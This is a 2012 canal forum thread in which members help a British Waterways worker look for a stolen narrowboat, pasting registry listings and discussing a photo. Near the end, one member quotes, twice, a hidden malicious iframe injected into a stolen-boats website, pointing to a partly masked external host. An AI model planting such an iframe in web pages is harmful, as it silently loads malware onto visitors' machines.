GeorgeD Posted May 22, 2012 Report Share Posted May 22, 2012 Hi folks remember me George from Bw Braunston. You helped me recover the stolen boat last year whiich turned up in atherstone. The name of the boat was moonlight dancer. Well guess what? I have another one and hopefully you will help again please. this boat is called Cloud 9 BW No. 519819 boat name not on boat believed stolen over the last 2 to 3 weeks and not seen when BW checked Norton Jct on 17th May 60ft Geeen cream Liverpool boat built 2007 Stolen from the bottom of the Leicester Line at Norton Jct My checks at Watford Locks have no record of that boat going through. There was an unconfirmed sighting heading south through the Buckby Flight. WHEN i WORK OUT HOW TO UPLOAD A PHOTO i WILL DO SO Link to comment Share on other sites More sharing options...
carlt Posted May 22, 2012 Report Share Posted May 22, 2012 Hi George If you can email a photo to carlt88(at)aol.com I will post the photo here (replace the (at) with @) Link to comment Share on other sites More sharing options...
GeorgeD Posted May 22, 2012 Author Report Share Posted May 22, 2012 Hi folks remember me George from Bw Braunston. You helped me recover the stolen boat last year whiich turned up in atherstone. The name of the boat was moonlight dancer. Well guess what? I have another one and hopefully you will help again please. this boat is called Cloud 9 BW No. 519819 boat name not on boat believed stolen over the last 2 to 3 weeks and not seen when BW checked Norton Jct on 17th May 60ft Geeen cream Liverpool boat built 2007 Stolen from the bottom of the Leicester Line at Norton Jct My checks at Watford Locks have no record of that boat going through. There was an unconfirmed sighting heading south through the Buckby Flight. WHEN i WORK OUT HOW TO UPLOAD A PHOTO i WILL DO SO Link to comment Share on other sites More sharing options...
alan_fincher Posted May 22, 2012 Report Share Posted May 22, 2012 (edited) It may be an advantage that the name is not on the boat in this case. There appear to be an awful lot of boats with that or a similar name...... However none of the following come up as BW index number 519819, so are you totally sure that is the correct number, please ? EDITED TO ADD: THe BW On-Line Licence checker comes up with....... Online Boat Checker Our system recognises this boat but its licence has expired. The renewal might be in process. You can submit a sighting report by completing the form below to help our enforcement efforts. CLOUD NINE Built by VIKING - Length 7.01 metres (23 feet ) - Beam 2.1 metres (6 feet 11 inches ) - Draft 0.35 metres (1 feet 2 inches ) Fibre glass hull, power of 30 BHP. Registered with British Waterways number 105240 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by BIRCHWOOD - Length 7.62 metres (25 feet ) - Beam 2.81 metres (9 feet 3 inches ) - Draft 0.53 metres (1 feet 9 inches ) Fibre glass hull, power of 999 BHP. Registered with British Waterways number 106490 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by DAWNCRAFT - Length 6.7 metres (22 feet ) - Beam 2.08 metres (6 feet 10 inches ) - Draft 0.3 metres (1 feet ) Fibre glass hull, power of 10 BHP. Registered with British Waterways number 107675 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by VIKING MOULDINGS - Length 9.7 metres (31 feet 10 inches ) - Beam 1.8 metres (5 feet 11 inches ) - Draft 0.4 metres (1 feet 4 inches ) Fibre glass hull, power of 25 BHP. Registered with British Waterways number 112055 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE - Length 8.23 metres (27 feet ) - Beam 0.01 metres (0 feet ) - Draft 0.01 metres ( ) Fibre glass hull, power of 999 BHP. Registered with British Waterways number 112312 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by MARINE PROJECTS - Length 9.44 metres (31 feet ) - Beam 2.99 metres (9 feet 10 inches ) - Draft 0.91 metres (3 feet ) Fibre glass hull, . Registered with British Waterways number 113916 as a Powered. Last registration recorded on 11-Apr-2010. CLOUD NINE Built by MOODY - Length 10.2 metres (33 feet 6 inches ) - Beam 3.6 metres (11 feet 10 inches ) - Draft 1.52 metres (5 feet ) Fibre glass hull, power of 36 BHP. Registered with British Waterways number 114100 as a Other. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by Marine Projects Ltd in 1972 - Length 9.7 metres (31 feet 10 inches ) - Beam 2.9 metres (9 feet 6 inches ) 2 Diesel Inboard engines with a total power of 150HP. Registered with EA Thames Region number 48864 as a Non Hire Annual. Last registration recorded on 11/07/2007. CLOUD NINE - Length 12.19 metres (40 feet ) - Beam 2.08 metres (6 feet 10 inches ) Metal hull, power of 20BHP. Registered with British Waterways number 500369 as a Powered. Last registration recorded on 19/04/2005. CLOUD NINE Built by NOT KNOWN - Length 17.37 metres (57 feet ) - Beam 2.08 metres (6 feet 10 inches ) - Draft 0.61 metres (2 feet ) Metal hull, power of 43 BHP. Registered with British Waterways number 503826 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD 9 Built by ROGER MYERS N/BOATS - Length 17.37 metres (57 feet ) - Beam 3.1 metres (10 feet 2 inches ) - Draft 0.01 metres ( ) Metal hull, power of 999 BHP. Registered with British Waterways number 504558 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD 9 Built by NOT KNOWN - Length 18.59 metres (61 feet ) - Beam 4.72 metres (15 feet 6 inches ) - Draft 0.01 metres ( ) Metal hull, power of 6 BHP. Registered with British Waterways number 506582 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by DEESIDE NARROWBOATS - Length 16.76 metres (55 feet ) - Beam 2.74 metres (9 feet ) - Draft 0.3 metres (1 feet ) Metal hull, power of 38 BHP. Registered with British Waterways number 507448 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by SANDHILLS NARROWBOATS LTD - Length 18.29 metres (60 feet ) - Beam 2.08 metres (6 feet 10 inches ) - Draft 0.61 metres (2 feet ) Metal hull, power of 43 BHP. Registered with British Waterways number 508285 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD 9 Built by LIVERPOOL BOATS - Length 17.37 metres (57 feet ) - Beam 3.05 metres (10 feet ) - Draft 0.91 metres (3 feet ) Metal hull, power of 20 BHP. Registered with British Waterways number 512666 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD 9 Built by AQUAMARINE LTD - Length 18.28 metres (60 feet ) - Beam 2.08 metres (6 feet 10 inches ) - Draft 0.91 metres (3 feet ) Metal hull, power of 42 BHP. Registered with British Waterways number 512885 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD 9 Built by SEVERN VALLEY - Length 12.192 metres (40 feet ) - Beam 2.08 metres (6 feet 10 inches ) - Draft 0.72 metres (2 feet 4 inches ) Metal hull, power of 32 BHP. Registered with British Waterways number 516114 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by MIDLAND CNL CTR - Length 14.33 metres (47 feet ) - Beam 2.08 metres (6 feet 10 inches ) - Draft 0.61 metres (2 feet ) Metal hull, power of 999 BHP. Registered with British Waterways number 52642 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by RUGBY BOATBLDERS - Length 15.24 metres (50 feet ) - Beam 2.07 metres (6 feet 9 inches ) - Draft 1.21 metres (4 feet ) Metal hull, power of 35 BHP. Registered with British Waterways number 60282 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by FREEMAN - Length 6.71 metres (22 feet ) - Beam 2.28 metres (7 feet 6 inches ) - Draft 0.01 metres ( ) Fibre glass hull, power of 999 BHP. Registered with British Waterways number 65666 as a Powered. Last registration recorded on 11-Apr-2010. CLOUD 9 Built by FENMATCH LTD - Length 12.19 metres (40 feet ) - Beam 2.07 metres (6 feet 9 inches ) - Draft 0.61 metres (2 feet ) Metal hull, power of 20 BHP. Registered with British Waterways number 68143 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD 9 Built by WAVEY RIDER - Length 7.01 metres (23 feet ) - Beam 2.89 metres (9 feet 6 inches ) - Draft 0.01 metres ( ) Fibre glass hull, power of 55 BHP. Registered with British Waterways number 70842 as a Powered. Last registration recorded on 29-May-2011. CLOUD NINE Built by PRINCESS - Length 7.62 metres (25 feet ) - Beam 2.74 metres (9 feet ) - Draft 0.01 metres ( ) Fibre glass hull, power of 130 BHP. Registered with British Waterways number 72230 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by NORMAN - Length 6.71 metres (22 feet ) - Beam 2.08 metres (6 feet 10 inches ) Fibre glass hull, power of 4BHP. Registered with British Waterways number 75059 as a Powered. Last registration recorded on 11/07/2007. CLOUD NINE Built by SEALINE 32 STATESMAN in 1994 - Length 10.36 metres (34 feet ) - Beam 3.2 metres (10 feet 6 inches ) hull colour WHITE superstructure colour WHITE 2 Diesel Inboard engines with a total power of 180HP. Registered with Broads Authority number 953R as a Motor. Last registration recorded on 17-May-09. CLOUD NINE Built by POPULAR BOATS - Length 6.09 metres (20 feet ) - Beam 2.07 metres (6 feet 9 inches ) - Draft 0.01 metres ( ) Fibre glass hull, power of 10 BHP. Registered with British Waterways number 99410 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by Fairline Holiday in 1979 - Length 6.73 metres (22 feet 1 inch ) - Beam 2.59 metres (8 feet 6 inches ) hull colour White superstructure colour White&blue a Petrol Inboard engine with a power of 130HP. Registered with EA Anglian Region number G12528 as a Motor boat. Last registration recorded on 27/04/2007. CLOUD NINE Built by Barnes Brinkcraft in 1994 - Length 9.2 metres (30 feet 2 inches ) - Beam 3.1 metres (10 feet 2 inches ) hull colour WHITE superstructure colour WHITE a Diesel Inboard engine with a power of 45HP. Registered with EA Anglian Region number G14258 as a Motor boat. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by Maxum 2500 Src in 1992 - Length 7.5 metres (24 feet 7 inches ) - Beam 2.5 metres (8 feet 2 inches ) hull colour White/red superstructure colour White Petrol Inboard power of 6HP. Registered with EA Anglian Region number G17940 as a Motor boat. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by VIKING MOULDINGS - Length 7.9 metres (25 feet 11 inches ) - Beam 2.8 metres (9 feet 2 inches ) - Draft 0.5 metres (1 feet 8 inches ) Fibre glass hull, power of 50 BHP. Registered with British Waterways number 116060 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by MILBURN BOATS - Length 17.374 metres (57 feet ) - Beam 3.81 metres (12 feet 6 inches ) Not assigned hull, power of 75 BHP. Registered with British Waterways number 520117 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE IV Built by Freeman 22 in 1971 - Length 6.7 metres (22 feet ) - Beam 2 metres (6 feet 7 inches ) a Petrol Inboard engine with a power of 1098CC. Registered with EA Thames Region number M2117 as a Non Hire Annual. Last registration recorded on 20-Apr-2012. CLOUD 9 V Built by Severn Valley Boats in 2002 - Length 12.1 metres (39 feet 8 inches ) - Beam 2 metres (6 feet 7 inches ) a Diesel Inboard . Registered with EA Thames Region number F004818 as a Non Hire Annual. Last registration recorded on 11/07/2007. CLOUD NINE VI Built by Sea Aird 813 in 1980 - Length 8.2 metres (26 feet 11 inches ) - Beam 2.8 metres (9 feet 2 inches ) a Diesel Inboard engine with a power of 48HP. Registered with EA Thames Region number G1780 as a Non Hire Annual. Last registration recorded on 20-Apr-2012. CLOUD NINE VII Built by Chris Craft in 2000 - Length 8 metres (26 feet 3 inches ) - Beam 2.5 metres (8 feet 2 inches ) a Petrol Inboard engine with a power of 6HP. Registered with EA Thames Region number F015016 as a Non Hire Annual. Last registration recorded on 20-Apr-2012. CLOUD 99 Built by PEGAUSUS 700 - Length 7.1 metres (23 feet 4 inches ) - Beam 2.47 metres (8 feet 1 inch ) Fibre glass hull, power of 10BHP. Registered with British Waterways number 112646 as a Powered. Last registration recorded on 19/04/2008. CLOUD NO 9 Built by Steel Narrow Boat in 1998 - Length 15.08 metres (49 feet 6 inches ) - Beam 2.43 metres (8 feet ) hull colour BLACK superstructure colour BLU/GN a Diesel Inboard engine with a power of 43HP. Registered with EA Anglian Region number N9079 as a Motor boat. Last registration recorded on 20-Apr-2012. CLOUD NO9 N9079 Built by G.J.REEVES (BTBLDRS) - Length 15.01 metres (49 feet 3 inches ) - Beam 2.09 metres (6 feet 10 inches ) Metal hull, power of 43BHP. Registered with British Waterways number 504494 as a Powered. Last registration recorded on 19/04/2008. CLOUD NYNE Built by ENSIGN - Length 7.62 metres (25 feet ) - Beam 2.083 metres (6 feet 10 inches ) - Draft 0.457 metres (1 feet 6 inches ) Fibre glass hull, power of 10 BHP. Registered with British Waterways number 114041 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NYNE Built by Ensign in 1981 - Length 7.62 metres (25 feet ) - Beam 2.08 metres (6 feet 10 inches ) hull colour CREAM superstructure colour BROWN a Petrol Outboard engine with a power of 9HP. Registered with EA Anglian Region number N6068 as a Motor boat. Last registration recorded on 27/04/2007. Edited May 22, 2012 by alan_fincher Link to comment Share on other sites More sharing options...
carlt Posted May 22, 2012 Report Share Posted May 22, 2012 (edited) Jim Shead doesn't recognise the number Alan but the BW snitch site does. Edited to add: missed your edit. Edited May 22, 2012 by carlt Link to comment Share on other sites More sharing options...
GeorgeD Posted May 22, 2012 Author Report Share Posted May 22, 2012 It may be an advantage that the name is not on the boat in this case. There appear to be an awful lot of boats with that or a similar name...... However none of the following come up as BW index number 519819, so are you totally sure that is the correct number, please ? EDITED TO ADD: THe BW On-Line Licence checker comes up with....... Thanks good idea the number is correct but the boat hadbeen out of the water since 2009 so probably we have 'binned' it. It does work on our systems Link to comment Share on other sites More sharing options...
carlt Posted May 22, 2012 Report Share Posted May 22, 2012 (edited) This is the boat: Edited to add:If I wear my Mother's glasses it is in focus. Edited May 22, 2012 by carlt Link to comment Share on other sites More sharing options...
smudge837 Posted May 22, 2012 Report Share Posted May 22, 2012 Ok I know I am not the sharpest tool in the box, but.... Ask who took the photo with todays time stamp they will know where it is. Link to comment Share on other sites More sharing options...
bottle Posted May 22, 2012 Report Share Posted May 22, 2012 (edited) I expect it is a picture of a picture. ps. to photographer, a macro setting on the camera would have helped. Of course the original would have had to be in focus. Edited May 22, 2012 by bottle Link to comment Share on other sites More sharing options...
the grinch Posted May 22, 2012 Report Share Posted May 22, 2012 It may be an advantage that the name is not on the boat in this case. There appear to be an awful lot of boats with that or a similar name...... However none of the following come up as BW index number 519819, so are you totally sure that is the correct number, please ? EDITED TO ADD: THe BW On-Line Licence checker comes up with....... CLOUD NINE Built by NOT KNOWN - Length 17.37 metres (57 feet ) - Beam 2.08 metres (6 feet 10 inches ) - Draft 0.61 metres (2 feet ) Metal hull, power of 43 BHP. Registered with British Waterways number 503826 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD 9 Built by ROGER MYERS N/BOATS - Length 17.37 metres (57 feet ) - Beam 3.1 metres (10 feet 2 inches ) - Draft 0.01 metres ( ) Metal hull, power of 999 BHP. Registered with British Waterways number 504558 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD 9 Built by NOT KNOWN - Length 18.59 metres (61 feet ) - Beam 4.72 metres (15 feet 6 inches ) - Draft 0.01 metres ( ) Metal hull, power of 6 BHP. Registered with British Waterways number 506582 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD NINE Built by SANDHILLS NARROWBOATS LTD - Length 18.29 metres (60 feet ) - Beam 2.08 metres (6 feet 10 inches ) - Draft 0.61 metres (2 feet ) Metal hull, power of 43 BHP. Registered with British Waterways number 508285 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD 9 Built by LIVERPOOL BOATS - Length 17.37 metres (57 feet ) - Beam 3.05 metres (10 feet ) - Draft 0.91 metres (3 feet ) Metal hull, power of 20 BHP. Registered with British Waterways number 512666 as a Powered. Last registration recorded on 20-Apr-2012. CLOUD 9 Built by AQUAMARINE LTD - Length 18.28 metres (60 feet ) - Beam 2.08 metres (6 feet 10 inches ) - Draft 0.91 metres (3 feet ) Metal hull, power of 42 BHP. Registered with British Waterways number 512885 as a Powered. Last registration recorded on 20-Apr-2012. editing out all the not likely leaves just these few Link to comment Share on other sites More sharing options...
alan_fincher Posted May 22, 2012 Report Share Posted May 22, 2012 editing out all the not likely leaves just these few It's none of them, I think! I didn't make my point very well, but know I have passed an awful lot of "Cloud 9" or "Colud Nine" boats, so I hope George isn't inundated with countless sightings of other boats. From that picture I couldn't even start to guess it was a Liverpool Boat, so hopefully someone can come up with something even vaguely in focus! Link to comment Share on other sites More sharing options...
the grinch Posted May 22, 2012 Report Share Posted May 22, 2012 It's none of them, I think! probably right!! its just another cloud floating by Link to comment Share on other sites More sharing options...
RLWP Posted May 22, 2012 Report Share Posted May 22, 2012 The lining out of that back panel is quite distinctive Richard Link to comment Share on other sites More sharing options...
GeorgeD Posted May 22, 2012 Author Report Share Posted May 22, 2012 Hi folks sorry Ive been indisposed for an hour. the photo is what I took of a still that the owner had. It was my only way of getting a quick image to put on here so sorry for the quality Link to comment Share on other sites More sharing options...
RLWP Posted May 22, 2012 Report Share Posted May 22, 2012 (edited) this boat is called Cloud 9 BW No. 519819 boat name not on boat 60ft Green Cream Liverpool boat built 2007 From the picture: Five windows (gold framed?), one porthole Semi-trad stern Chimney of front right corner with stainless flue ? Gunnels are green to top strake Roof is cream? Rear panel lined only in front top and back bottom corner Rear deck green Anyone spot anything else? Richard Edited May 22, 2012 by RLWP Link to comment Share on other sites More sharing options...
GeorgeD Posted May 22, 2012 Author Report Share Posted May 22, 2012 folks ive got to go now thanks all for your efforts and observations. I will be back on this forum tomorrow morning if possible I will have more inf, the owner has reported it to the Police, I have liaised with them and also the insurance company have been on to me so maybe we can solve this one as well. Link to comment Share on other sites More sharing options...
Starcoaster Posted May 22, 2012 Report Share Posted May 22, 2012 George are you still based at the stop house? I am on the marina and can pop by tomorrow if it's helpful to get a better version of the pic to post on line etc. Link to comment Share on other sites More sharing options...
jenlyn Posted May 22, 2012 Report Share Posted May 22, 2012 That's going to be painted over really quickly, need a better pic to get more detail. Link to comment Share on other sites More sharing options...
lewisericeric Posted May 22, 2012 Report Share Posted May 22, 2012 I really don't mean this to sound leary, but WHY would you steal a narrowboat??? Surely you'll never get away with it???? Link to comment Share on other sites More sharing options...
alan_fincher Posted May 22, 2012 Report Share Posted May 22, 2012 I really don't mean this to sound leary, but WHY would you steal a narrowboat??? Surely you'll never get away with it???? Are you going to suggest that thieves should have their hands cut off, like you did the last time the question of a stolen narrow boat came up then ? folks ive got to go now thanks all for your efforts and observations. I will be back on this forum tomorrow morning if possible I will have more inf, the owner has reported it to the Police, I have liaised with them and also the insurance company have been on to me so maybe we can solve this one as well. I was going to say the insurance company can ensure greater publicity if they get the details published on www.stolenboats.org.uk, but when I go to that site my virus checker suggest it is infected Link to comment Share on other sites More sharing options...
lewisericeric Posted May 22, 2012 Report Share Posted May 22, 2012 (edited) Are you going to suggest that thieves should have their hands cut off, like you did the last time the question of a stolen narrow boat came up then ? Erm.... no , I was actually just interested as to why someone would think they could get away with it unless they were planning on having it airlifted to France asap. I didn't really want to get into the politics of what should/shouldn't happen to thieves/rapists/murderers. I think the important thing here is to stay on topic and this one is about finding a stolen narrowboat Edited May 22, 2012 by lewisericeric Link to comment Share on other sites More sharing options...
trampyjoe Posted May 22, 2012 Report Share Posted May 22, 2012 (edited) I was going to say the insurance company can ensure greater publicity if they get the details published on www.stolenboats.org.uk, but when I go to that site my virus checker suggest it is infected it'll probably be that hidden iframe - <iframe src='http://****ump.in/direct/gogo.php?sid=2' width='2' height='4' frameborder='0' style='visibility: hidden;'></iframe><br /> ETA - shame really as that would be a very useful site! Edited May 22, 2012 by trampyjoe Link to comment Share on other sites More sharing options...
Chertsey Posted May 22, 2012 Report Share Posted May 22, 2012 Erm.... no , I was actually just interested as to why someone would think they could get away with it unless they were planning on having it airlifted to France asap. I didn't really want to get into the politics of what should/shouldn't happen to thieves/rapists/murderers. I think the important thing here is to stay on topic and this one is about finding a stolen narrowboat No one else has mentioned rapists and murderers on this thread as far as I am aware... Link to comment Share on other sites More sharing options...
bizzard Posted May 22, 2012 Report Share Posted May 22, 2012 it'll probably be that hidden iframe - <iframe src='http://****ump.in/direct/gogo.php?sid=2' width='2' height='4' frameborder='0' style='visibility: hidden;'></iframe><br /> ETA - shame really as that would be a very useful site! It appears to be a virus aimed at Java script. Link to comment Share on other sites More sharing options...
jenlyn Posted May 22, 2012 Report Share Posted May 22, 2012 No one else has mentioned rapists and murderers on this thread as far as I am aware... Erm, you just did as well? Tho I don't see there was a need for you to bring it up too? Link to comment Share on other sites More sharing options...
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